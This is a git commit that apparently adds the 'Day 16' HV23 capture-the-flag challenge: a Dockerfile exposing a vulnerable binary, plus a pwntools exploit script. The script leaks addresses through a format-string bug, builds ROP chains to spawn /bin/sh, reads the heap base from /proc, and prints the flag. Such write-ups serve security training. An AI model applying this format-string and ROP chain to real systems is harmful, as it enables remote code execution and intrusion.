Day 16
This commit is contained in:
parent
14a2b0f4ad
commit
2bf71ada77
11
Day 16/Dockerfile
Normal file
11
Day 16/Dockerfile
Normal file
@ -0,0 +1,11 @@
|
||||
FROM ubuntu:23.04
|
||||
|
||||
RUN apt update && apt -y upgrade
|
||||
RUN apt install -y socat
|
||||
|
||||
COPY . .
|
||||
|
||||
RUN chmod +x vuln
|
||||
RUN chmod +x magic.sh
|
||||
|
||||
ENTRYPOINT socat TCP-LISTEN:1337,reuseaddr,fork EXEC:'./vuln',raw
|
147
Day 16/exploit.py
Executable file
147
Day 16/exploit.py
Executable file
@ -0,0 +1,147 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
# This exploit template was generated via:
|
||||
# $ pwn template '--host=152.96.15.8' '--port=1337'
|
||||
from pwn import *
|
||||
from hackingscripts import util
|
||||
import struct
|
||||
|
||||
exe = context.binary = ELF(args.EXE or './vuln')
|
||||
libc = ELF("./libc6_2.37-0ubuntu2.2_amd64.so", checksec=False)
|
||||
|
||||
# Many built-in settings can be controlled on the command-line and show up
|
||||
# in "args". For example, to dump all data sent/received, and disable ASLR
|
||||
# for all created processes...
|
||||
# ./exploit.py DEBUG NOASLR
|
||||
# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
|
||||
host = args.HOST or 'b8fb5148-65c8-4306-9341-e2ba20821791.rdocker.vuln.land'
|
||||
port = int(args.PORT or 1337)
|
||||
|
||||
def start_local(argv=[], *a, **kw):
|
||||
'''Execute the target binary locally'''
|
||||
if args.GDB:
|
||||
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
|
||||
else:
|
||||
return process([exe.path] + argv, *a, **kw)
|
||||
|
||||
def start_remote(argv=[], *a, **kw):
|
||||
'''Connect to the process on the remote host'''
|
||||
io = connect(host, port)
|
||||
if args.GDB:
|
||||
gdb.attach(io, gdbscript=gdbscript)
|
||||
return io
|
||||
|
||||
def start(argv=[], *a, **kw):
|
||||
'''Start the exploit against the target.'''
|
||||
if args.LOCAL:
|
||||
return start_local(argv, *a, **kw)
|
||||
else:
|
||||
return start_remote(argv, *a, **kw)
|
||||
|
||||
# Specify your GDB script here for debugging
|
||||
# GDB will be launched if the exploit is run via e.g.
|
||||
# ./exploit.py GDB
|
||||
gdbscript = '''
|
||||
continue
|
||||
'''.format(**locals())
|
||||
|
||||
#===========================================================
|
||||
# EXPLOIT GOES HERE
|
||||
#===========================================================
|
||||
|
||||
def tell_flag(username, fmt):
|
||||
|
||||
if not isinstance(username, bytes):
|
||||
username = username.encode()
|
||||
|
||||
if not isinstance(fmt, bytes):
|
||||
fmt = fmt.encode()
|
||||
|
||||
io.recvuntil(b"> ")
|
||||
io.sendline(username)
|
||||
io.recvuntil(b"> ")
|
||||
|
||||
io.sendline(fmt)
|
||||
result = io.recvuntil(b"I will see what I can do...\n")
|
||||
|
||||
prefix = b"\x1b[?25h\nSanta: You want me to help you with "
|
||||
if result.startswith(prefix):
|
||||
result = result[len(prefix):]
|
||||
|
||||
suffix = b"?\nSanta: I will see what I can do...\n"
|
||||
if result.endswith(suffix):
|
||||
result = result[:-len(suffix)]
|
||||
|
||||
return result
|
||||
|
||||
def do_conn(username, fmt):
|
||||
|
||||
io.recvuntil(b"(y/n)? ")
|
||||
io.sendline(b"y")
|
||||
|
||||
data = io.recvuntil(b"> ")
|
||||
lines = data.decode().split("\n")
|
||||
present_count = {"red": 0, "blue": 0, "yellow": 0}
|
||||
for line in lines:
|
||||
match = re.match(r"\s*-\s*(red|yellow|blue)", line.strip())
|
||||
if match:
|
||||
color = match[1]
|
||||
present_count[color] = present_count[color] + 1
|
||||
|
||||
io.sendline(str(present_count["red"]).encode())
|
||||
io.recvuntil(b"> ")
|
||||
io.sendline(str(present_count["yellow"]).encode())
|
||||
io.recvuntil(b"> ")
|
||||
io.sendline(str(present_count["blue"]).encode())
|
||||
return tell_flag(username, fmt)
|
||||
|
||||
io = start()
|
||||
payload = b""
|
||||
payload += b"%35$p|%39$p|"
|
||||
payload += (168 - len(payload)) * b"A"
|
||||
assert len(payload) == 168
|
||||
payload += p8(0xA0)
|
||||
|
||||
result = do_conn("x", payload)
|
||||
leak = result.split(b'|')
|
||||
|
||||
exe.address = int(leak[0][2:],16) - exe.symbols["main"] - 158
|
||||
log.info(f"Piebase: {hex(exe.address)}")
|
||||
|
||||
libc_leak = int(leak[1][2:],16)+48
|
||||
libc.address = libc_leak - libc.symbols["__libc_start_main"]
|
||||
log.info(f"libc leak: {hex(libc_leak)} ")
|
||||
log.info(f"libc base: {hex(libc.address)}")
|
||||
|
||||
# chain for shell
|
||||
rop = ROP([libc, exe])
|
||||
rop.raw(rop.find_gadget(['ret'])) # stack align
|
||||
rop.system(next(libc.search(b"/bin/sh")))
|
||||
rop.raw(rop.find_gadget(['ret'])) # stack align
|
||||
rop.call(exe.symbols["tellflag"])
|
||||
payload = b"A"*168 + rop.chain()
|
||||
tell_flag("x", payload)
|
||||
|
||||
io.sendline(b"ps | grep vuln | awk '{print $1}'")
|
||||
pid = io.recvline().strip().decode()
|
||||
print("[+] Got PID:", pid)
|
||||
|
||||
io.sendline(f"cat /proc/{pid}/maps | grep heap | awk -F '-' '{{print $1}}'".encode())
|
||||
heap_base = int(io.recvline().decode(), 16)
|
||||
print("[+] Got Heap base:", hex(heap_base))
|
||||
io.sendline(b"exit")
|
||||
|
||||
rop = ROP([libc])
|
||||
rop.raw(rop.find_gadget(['ret'])) # stack align
|
||||
rop.puts(heap_base + 0x484, )
|
||||
rop.call(exe.symbols["main"])
|
||||
|
||||
payload = b""
|
||||
payload += 160 * b"A"
|
||||
payload += p64(0)
|
||||
payload += rop.chain()
|
||||
tell_flag("x", payload)
|
||||
flag = "HV23" + io.recvline().decode().strip()
|
||||
print("[+] Flag:", flag)
|
||||
io.close()
|
||||
|
BIN
Day 16/libc6_2.37-0ubuntu2.2_amd64.so
Normal file
BIN
Day 16/libc6_2.37-0ubuntu2.2_amd64.so
Normal file
Binary file not shown.
BIN
Day 16/santas-gift-factory.zip
Normal file
BIN
Day 16/santas-gift-factory.zip
Normal file
Binary file not shown.
BIN
Day 16/vuln
Executable file
BIN
Day 16/vuln
Executable file
Binary file not shown.
Loading…
Reference in New Issue
Block a user